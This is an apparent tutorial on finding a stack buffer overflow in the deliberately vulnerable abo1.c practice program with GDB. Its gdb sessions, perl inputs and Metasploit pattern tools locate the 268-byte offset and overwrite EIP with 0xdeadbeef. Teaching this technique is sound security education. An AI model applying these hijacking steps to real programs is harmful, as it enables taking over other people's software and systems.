Introduction to Debugging

Prerequisites: 

A basic understanding of fuzzing methods -- https://www.soldierx.com/tutorials/Fuzzing-Basics
Linux installation with a BASH Shell
GCC
GNU Debugger

Debugging is the process of finding software errors in a computer program. Software errors can cause problems during use. These problems can range from memory corruption or allocation errors to references to invalid data sources. Either way you look at it, software bugs are not desirable and need to be remediated. From a security standpoint, software errors can affect the flow of a program or process, possibly opening it up to exploitation.

Depending on the type of program we are debugging, we can select the best tools to peel the program apart layer by layer. If we are running a Linux binary, the most common debugger available is the "GNU Debugger", or GDB. GDB is a powerful debugger, but its power is hidden behind a classic command line interface (CLI). Through the gdb interface, you can disassemble the CPU instructions that make up the program and set breakpoints, which allow you to examine variables, registers, flags, memory addresses and anything else going on at a specific point of the program's execution.

This ability allows us to make use of the fuzzing methods described in the previous article linked above. By tracking down the parts of a program our fuzzing techniques have broken, we can gain a better understanding of how to take over a process or function in a program, effectively allowing you to execute code of your choosing.

There are many things that could be described inside of a debugger. For now we are going to focus on just what we need to know. If you want more information on topics we briefly touch on, feel free to ask in the comments, and I will help you get some resources to better understand the related principle.

Registers:

Registers are small, very fast storage locations inside the processor that hold the data it is currently working on. Each processor architecture carries its own set of registers unique to its own capabilities. This is one of the fundamental differences between system architectures. Intel's x86 instruction set is the most commonly used, as most PCs run x86 or x86_64 processors. These processors differ from RISC designs such as Alpha.

For this tutorial, we are going to focus on the x86 architecture.

The following is a list of general registers. We will not need to know ALL of these in detail for this session, but a solid understanding of them will help in being able to follow raw machine code cleanly.
--------------------------------------------------------------------------
Temporary variables stored for the CPU:
EAX - Accumulator Register
ECX - Counter Register
EDX - Data Register
EBX - Base Register
--------------------------------------------------------------------------
32-bit addresses that point to specific locations in memory:
ESP - Stack Pointer
EBP - Base Pointer
--------------------------------------------------------------------------
Pointers that direct to the source or destination when data needs to be written:
ESI - Source Index
EDI - Destination Index
--------------------------------------------------------------------------
EIP - Instruction Pointer - Points to the next instruction the processor will execute
EFLAGS - Several bit flags used for bit-wise logic and operator comparisons

Pointers:

A pointer is a variable that points to some form of data by holding a memory address. On x86 that address is 32 bits, or 4 bytes, in size. In C source code, a pointer is declared with a leading asterisk (*). The asterisk is also the dereference operator: applied to a pointer, it follows the stored memory address and reads back the data stored at that location. Its counterpart is the address-of operator, the ampersand (&). When used in C, it returns the memory address of a variable instead of the data stored inside of it.

&VariableA
*VariableA
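
The two operators can be mimicked outside of C as well. The following is only a rough sketch using Python's ctypes module; the name variable_a is made up for illustration, and on a 64-bit host the printed address will be wider than the 32 bits discussed here.

```python
import ctypes

# Roughly `int variable_a = 42;` in C.
variable_a = ctypes.c_int32(42)

# Roughly `&variable_a`: the memory address where the value lives.
address = ctypes.addressof(variable_a)

# Roughly `int *ptr = &variable_a;`: a pointer holding that address.
ptr = ctypes.pointer(variable_a)

# Roughly `*ptr`: follow the address and read the data stored there.
value = ptr.contents.value
print(hex(address), value)

# Writing through the pointer changes the original variable,
# because both names refer to the same memory.
ptr.contents.value = 7
print(variable_a.value)
```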

EAX, ECX, EDX, sheesh what is with all of these E's?

Well, a long time ago, in a land far, far away, there were these ancient machines that ran on fewer than 64 bits, fewer than 32 bits even. Back then, you had a whole 16-bit processor (or less) to work with! Registers and Pointers existed then as well, but back in those times, it was literally just an Accumulator Register, a Stack Pointer and so on... As computing advanced, the 16-bit architecture was Extended to 32-bit addressing.

Did you figure out the "E" now? Correct, they are all Extended XX's, providing 16 more bits.
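
To make the "Extended" idea concrete, here is a small sketch that treats a register as a plain 32-bit number and masks out the older, narrower registers that still live inside it. The value loaded into eax is an arbitrary example, and the AH/AL halves are standard x86 names that this tutorial does not otherwise use.

```python
# An arbitrary 32-bit value, standing in for the contents of EAX.
eax = 0xDEADBEEF

# The original 16-bit AX register is the lower half of EAX.
ax = eax & 0xFFFF

# AX itself splits into a high byte (AH) and a low byte (AL).
ah = (eax >> 8) & 0xFF
al = eax & 0xFF

print(f"EAX=0x{eax:08x} AX=0x{ax:04x} AH=0x{ah:02x} AL=0x{al:02x}")
```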

As mentioned earlier, these all have their different levels of importance, but today we are going to focus on the few that apply to our example.

EIP is going to be the REALLY important pointer, as it tells the processor the memory address of the instruction it should process next. If you can redirect EIP to a different memory address of your choosing, one that contains the instructions YOU want to run, you have essentially hit pay-dirt. Controlling the EIP register is going to be the whole focus of our exercise...

The Stack:

There are numerous segments that make up the memory of a running program. There are Text, Data, BSS, Heap and Stack segments that work together to pass around the required data, environment variables, etc. Although this is rather expansive, I am going to focus on one segment, called the stack segment.

To be able to understand how such a critically important pointer can be modified, we need to examine the layout of the memory stack created to run your code. This memory stack lays out information relative to the function being run by the CPU. This information includes local variables (initialized or not), the Saved Frame Pointer (the caller's Base Pointer), the return address, and other values being stored for the running function.

Storing certain variables in the stack segment allows those variables to be unique within different function contexts. For example, the VarA and VarB used in FunctionA, where VarA is subtracted from VarB, are separate from the VarA and VarB used in FunctionB, where they are added together.

This segment of memory starts at the high memory addresses, and as more data gets put on, it grows towards the lower memory addresses.

Using the example provided during the last session, abo1.c would have a stack laid out similar to what is described below.

Top of Stack
------------------------- Low memory addresses/Top of Stack (0xbfff0000)
0xbffff590 $ESP                   |  16 bytes
0xbffff5a0 256 byte array 'buf'   | 264 bytes
0xbffff6a8 $EBP                   |   4 bytes
0xbffff6ac Return Address (RET)   |   4 bytes
------------------------- High memory addresses/Bottom of Stack (0xffffffff)

Falling back to the previous tutorial, we know that the code used in our vulnerable sample does not check how much data is going to be placed in buf at 0xbffff5a0 and will gladly copy the whole string you input. Our source does define 256 bytes for the array, so when the stack gets set up, 256 bytes plus 8 bytes of padding are allocated. When the 300-byte string gets copied into buf using strcpy, nothing is checked against what has been allocated, so the rest of the 300 bytes spill over the 8 bytes of padding, over the 4 bytes of the saved $EBP (the Saved Frame Pointer), and even over the 4-byte Return Address at 0xbffff6ac. Since we wrote only the letter A, our return address directs us to 0x41414141, which is not a valid memory address for this binary.
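
The overwrite can be modeled without touching a real process. The sketch below is a toy model only: it uses the 264/4/4 byte layout from the stack diagram, the function name simulate_strcpy and the "EBP!"/"RET!" placeholder values are made up, and it ignores the terminating NUL byte a real strcpy would also write.

```python
BUF_TO_SAVED_EBP = 264  # buf plus padding, taken from the layout above
SAVED_EBP_SIZE = 4
RET_SIZE = 4
FRAME_SIZE = BUF_TO_SAVED_EBP + SAVED_EBP_SIZE + RET_SIZE


def simulate_strcpy(payload: bytes) -> dict:
    """Copy payload into a fake stack frame with no bounds check on buf."""
    # Placeholder values make any overwrite easy to spot.
    frame = bytearray(b"\x00" * BUF_TO_SAVED_EBP + b"EBP!" + b"RET!")
    # Like strcpy, keep copying past the end of buf. We only stop at the
    # edge of this toy frame so the model stays a fixed size.
    count = min(len(payload), FRAME_SIZE)
    frame[:count] = payload[:count]
    return {
        "saved_ebp": bytes(frame[264:268]),
        "ret": bytes(frame[268:272]),
    }


safe = simulate_strcpy(b"A" * 256)
smashed = simulate_strcpy(b"A" * 300)

print(safe["ret"])  # still the placeholder
print(hex(int.from_bytes(smashed["ret"], "little")))  # where EIP ends up
```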

If you look at the stack example earlier, you can see how memory addresses are listed along the left hand side. Understanding how memory is laid out is extremely important during the exploitation process, but it can also prove extremely difficult to gain a solid grasp on.

Beyond understanding the stack, and how data is organized inside of it, we really need to know how to debug a running binary, and how to use the debugger to reveal the aspects of the binary we are trying to exploit.

As mentioned earlier, we are going to be working with the GNU Debugger, otherwise referred to as 'gdb'. From the BASH prompt on a Linux terminal, you should be able to start up gdb with our test binary loaded.

--------------------------------
$ gdb ./abo1
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb)
--------------------------------

We already know that 300 bytes pushed to abo1 will cause a segmentation fault, as explained earlier, so let us give that a try from gdb.

--------------------------------
(gdb) run $(perl -e 'print "A"x300')
Starting program: ./abo1 $(perl -e 'print "A"x300')

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
--------------------------------

Remember how we had discussed 0x41 being the letter "A" in Hexadecimal ASCII? It appears the letter "A" has ended up going somewhere it wasn't intended to go!

Let us take a closer look at what is going on by setting a break-point before our argc[1] gets strcpy'd into buf.

--------------------------------
(gdb) list 1
1       /* abo1.c                                       *
2        * specially crafted to feed your brain by gera */
3
4       /* Dumb example to let you get introduced...    */
5
6       int main(int argv,char **argc) {
7               char buf[256];
8
9               strcpy(buf,argc[1]);
10      }
(gdb) break 9
Breakpoint 1 at 0x8048387: file abo1.c, line 9.
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: ./abo1 $(perl -e 'print "A"x300')

Breakpoint 1, main (argv=2, argc=0xbffff724) at abo1.c:9
9               strcpy(buf,argc[1]);
(gdb)
--------------------------------

Following along above, we can list the source code associated with abo1.c because we compiled it earlier with gcc using the -g flag, which keeps the debugging symbols associated with the binary. The list command, followed by the line number you wish to start listing from, displays the selected source code. Since it's a small program, and we want to see the entire code, we can just use 1 as the argument to list.

The vulnerable section of code is on line 9, so we can set a breakpoint in gdb using the break command, followed by the line number we wish to set the breakpoint on.

Entering run into GDB will restart the program from the beginning, stopping at the first breakpoint it hits. This is the state of the program before our fuzzed data gets copied onto the stack and into the location of buf.

Using gdb, we can then examine aspects of memory being called by the binary. We know one variable named 'buf' exists, and it can be checked by the following:

--------------------------------
(gdb) x/x buf
0xbffff590:     0xb7e9da28
--------------------------------

buf is stored at 0xbffff590, and the first 4 bytes there currently hold the value 0xb7e9da28. The same memory can be displayed as a string using the examine string command, as noted below.

--------------------------------
(gdb) x/s buf
0xbffff590:      "(????\201\004\b.N=??\201\004\b?\201\004\b"
--------------------------------

You should notice that the string data stored at this location is all junk. Uninitialized data. This is because 'buf' has not been written to yet; it holds whatever was left in that memory until the strcpy function copies argc[1] into it.

What other values did we discuss earlier? EBP and ESP, our base and stack pointers. We can view that data in much of the same way:

--------------------------------
(gdb) x/x $ebp
0xbffff698:     0xbffff6f8
(gdb) x/x $esp
0xbffff580:     0xf63d4e2e
--------------------------------

Following along with the addresses noted on the left hand side of the output, we can see the memory addresses for each of these values.

0xbffff580 (ESP)
0xbffff590 (buf)
0xbffff698 (EBP)

If you wanted to find out the difference in bytes between each of these fields, you could use the following print command:
--------------------------------
(gdb) print 0xbffff698 - 0xbffff590
$1 = 264
(gdb) print 0xbffff590 - 0xbffff580
$2 = 16
--------------------------------

Subtracting the address of buf from EBP gives you the space allocated for buf: 264 bytes. Add 4 bytes to 264 to overwrite the saved EBP, and you have a total of 268 bytes to fill from the start of the buffer to the end of the saved Extended Base Pointer (the Saved Frame Pointer). As mentioned earlier, the return address is stored directly after the saved EBP and holds the memory address of the next instruction the CPU jumps to when the function returns. Since we know RET is 4 bytes in length, 268 + 4 means the entire string we need to use to exploit is 272 bytes from beginning to end.
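
The same arithmetic can be double-checked outside of gdb. This is just a sketch that plugs in the three addresses reported in the session above; the variable names are made up, and the addresses will differ on another machine.

```python
# Addresses reported by gdb in this particular session.
ESP = 0xbffff580
BUF = 0xbffff590
EBP = 0xbffff698

esp_to_buf = BUF - ESP          # space between the stack pointer and buf
buf_to_ebp = EBP - BUF          # bytes from the start of buf up to saved EBP
offset_to_ret = buf_to_ebp + 4  # skip the 4-byte saved EBP
total_length = offset_to_ret + 4  # include the 4-byte return address

print(esp_to_buf, buf_to_ebp, offset_to_ret, total_length)
```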

Now that we have our boundaries defined and understood before our fuzzed code gets copied into 'buf', we can continue the debugger and see what happens.

--------------------------------
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
--------------------------------

Back to the crash seen earlier. Let us browse around for a minute, and review the memory addresses we were able to obtain during the last pass of gdb...

If you remember, 0xbffff590 was the reported location of buf. We can use the examine command once again to peek at that location in memory:

--------------------------------
(gdb) x/x 0xbffff590
0xbffff590:     0x41414141
(gdb) x/s 0xbffff590
0xbffff590:      'A' <repeats 200 times>...
--------------------------------

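Yep, the letter A is in the buffer, and repeating a bunch of times, but the output does not show the 300 times we specified! By default gdb only prints the first 200 characters of a string, and the trailing "..." means there is more. Let's keep looking...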
--------------------------------
(gdb) x/x 0xbffff698
0xbffff698:     0x41414141
(gdb) x/s 0xbffff698
0xbffff698:      'A' <repeats 36 times>
--------------------------------

EBP was at 0xbffff698 and it appears the letter A has found its way in there too! EIP obviously picked up the letter A from the Return Address just past it as well, which is why execution flow got redirected to 0x41414141. So we know our buffer filled out a lot of space in the running binary.

Using the methods shown a little earlier, we can fine tune our fuzzed string to validate the different portions of the code in use.

We know the space for buf runs 264 bytes up the stack, the 4 bytes past that hold the saved EBP, and the 4 bytes past that hold our Return Address. Splitting up our fuzzing string, we can use different letters to highlight our boundaries and the areas within the process we can modify/overwrite.

--------------------------------
(gdb) run $(perl -e 'print "A"x264 . "B"x4 . "C"x4')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: ./abo1 $(perl -e 'print "A"x264 . "B"x4 . "C"x4')

Breakpoint 1, main (argv=2, argc=0xbffff744) at abo1.c:9
9               strcpy(buf,argc[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
--------------------------------

Letting our fuzzed string continue through the break-point, 0x41414141 has changed to 0x43434343 or the letter C.

Looking at the string passed into abo1, if we were to examine the binary's Base Pointer, we can expect to see 0x42424242 stored in there.

--------------------------------
(gdb) x/x $ebp
0x42424242:     Cannot access memory at address 0x42424242
--------------------------------

Now all of our bounds have been defined clearly. We know where our buffer sits, we know where our base pointer is going, and we know we can hijack the address loaded into EIP from the Return Address.

As one final test to see whether the debugger has given us the proper values, let us format one more string and see if we can redirect EIP to a specific address of our choosing. For our example here, we are going to use 0xdeadbeef, a well-formed 32-bit address that does not point to anything mapped in this process.

Going back to the super fun exploit math mentioned earlier, it takes 268 bytes to reach the Return Address, followed by the memory address we want to replace it with, so EIP will jump there when the vulnerable function returns...

--------------------------------
(gdb) run $(perl -e 'print "A"x268 . "\xde\xad\xbe\xef"')
Starting program: ./abo1 $(perl -e 'print "A"x268 . "\xde\xad\xbe\xef"')

Breakpoint 1, main (argv=2, argc=0xbffff744) at abo1.c:9
9               strcpy(buf,argc[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xefbeadde in ?? ()
--------------------------------

Can you identify what happened in this example? We successfully caused a segmentation fault, but look at the address it tried to jump to:

0xefbeadde in ?? ()

That doesn't look quite right, especially since we know we wanted to go to 0xdeadbeef. Can anyone here explain this oddity?

One thing to know when working on Intel's x86 architecture is that it uses Little-Endian byte ordering. This means a multi-byte value is stored with its least significant byte at the lowest memory address, with the other bytes following in increasing order of significance. To simplify, this means that addresses get put into memory backwards. When passing the string \xde\xad\xbe\xef into the buffer to populate the return address, the bytes need to be written in reverse order, as shown below:

--------------------------------
(gdb) run $(perl -e 'print "A"x268 . "\xef\xbe\xad\xde"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: ./abo1 $(perl -e 'print "A"x268 . "\xef\xbe\xad\xde"')

Breakpoint 1, main (argv=2, argc=0xbffff744) at abo1.c:9
9               strcpy(buf,argc[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xdeadbeef in ?? ()
--------------------------------

And BINGO! Our binary segfaulted jumping to 0xdeadbeef, just like we wanted.
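
For anyone who wants to see the byte swap without running gdb, here is a short sketch using Python's standard struct module. It reads the first, naive byte string the way a little-endian CPU would, then packs the intended address correctly; the variable names are made up for illustration.

```python
import struct

target = 0xdeadbeef

# The first attempt wrote the bytes in the order we read the address.
naive_bytes = b"\xde\xad\xbe\xef"

# A little-endian CPU treats the first byte in memory as least significant.
as_seen_by_cpu = int.from_bytes(naive_bytes, "little")

# "<I" packs an unsigned 32-bit integer in little-endian order.
correct_bytes = struct.pack("<I", target)

print(hex(as_seen_by_cpu))   # the address gdb reported for the first attempt
print(correct_bytes.hex())   # the byte order the second attempt used
```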

Now that we know the exact point we can use to jump program execution elsewhere, the rest is just a matter of finding out where to jump execution to! The specifics of that portion will be addressed in the session after this. Our goal today was to overwrite EIP with a location of our choosing, which was accomplished by sending it to the (nonexistent) address 0xdeadbeef.

As an exercise for the group, you have seen the method utilizing perl I had employed to accomplish this task. Can any of you remember the syntax to achieve the same result using Python as described in our last session?
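
One possible answer, sketched in Python 3 rather than whatever syntax was shown in the last session (which is not reproduced here): the helper build_payload is a made-up name, and the 268 byte offset is the one worked out above.

```python
import struct


def build_payload(offset: int, ret_addr: int, filler: bytes = b"A") -> bytes:
    """Return filler bytes up to the return address, then the new address."""
    # "<I" stores the 32-bit address in little-endian order for x86.
    return filler * offset + struct.pack("<I", ret_addr)


payload = build_payload(268, 0xdeadbeef)

# Show a summary instead of dumping raw bytes to the terminal.
print(len(payload), payload[-4:].hex())
```

To hand the raw bytes to a program, the script would write them with sys.stdout.buffer.write(payload) instead of print, since print would try to encode them as text.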

Now that we have addressed the hard method of finding the distances between our values in the stack, we are going to approach this with an easier, new and improved method: using pattern_create.rb and pattern_offset.rb, both included with the Metasploit Framework.

If you remember from the previous session, pattern_create.rb will create a string of a size you specify. In our fuzzing example, we used a 300 byte pattern, so we will do the same again here:

--------------------------------
/var/opt/framework-4.0.0/msf3/tools$ ./pattern_create.rb 300
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9
Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1
Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj
4Aj5Aj6Aj7Aj8Aj9
--------------------------------

Using gdb's run command, you can copy the string provided by pattern_create.rb into the argc[1] field, or call $(/var/opt/framework-4.0.0/msf3/tools/pattern_create.rb 300) after run:
--------------------------------
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7
Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8A
f9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0
Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Starting program: ./abo1 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3
Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4
Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5A
i6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9

Breakpoint 1, main (argv=2, argc=0xbffff724) at abo1.c:9
9               strcpy(buf,argc[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()
--------------------------------

Our segmentation fault happened at 0x6a413969 in ?? (). We can now feed that address to pattern_offset.rb to discover how long the buffer has to be to reach the Return Address.
--------------------------------
/var/opt/framework-4.0.0/msf3/tools$ ./pattern_offset.rb 0x6a413969
268
--------------------------------

268 is exactly the same number we were able to determine by subtracting the address of buf from EBP (264) and adding 4 bytes to pad past the saved EBP (268). Except this method was much more efficient at returning our target value.
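
To see why the lookup works, here is a rough Python sketch of the same idea. It is not Metasploit's code: the function names simply mirror the two scripts, and the pattern is assumed to be the uppercase/lowercase/digit sequence visible in the output above.

```python
import string
from itertools import product


def pattern_create(length: int) -> str:
    """Build a non-repeating pattern: Aa0Aa1...Aa9Ab0... up to length."""
    chunks = []
    size = 0
    # Uppercase letter changes slowest, digit changes fastest.
    for upper, lower, digit in product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        if size >= length:
            break
        chunks.append(upper + lower + digit)
        size += 3
    return "".join(chunks)[:length]


def pattern_offset(eip: int, length: int = 300) -> int:
    """Return where the 4 bytes that landed in EIP sit inside the pattern."""
    # EIP was loaded little-endian, so undo the byte swap first.
    needle = eip.to_bytes(4, "little").decode("ascii")
    return pattern_create(length).find(needle)


print(pattern_create(300)[:30])
print(pattern_offset(0x6a413969))
```

Because every 4-byte window in the pattern is unique, the value that ends up in EIP identifies exactly one position in the string.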

I did wish to cover a few debugging applications for Windows as well as GDB, but in the interest of saving time, and sparing you a display of my total inability to use Windows itself, perhaps we will review OllyDbg, Immunity and various other debuggers at a later time.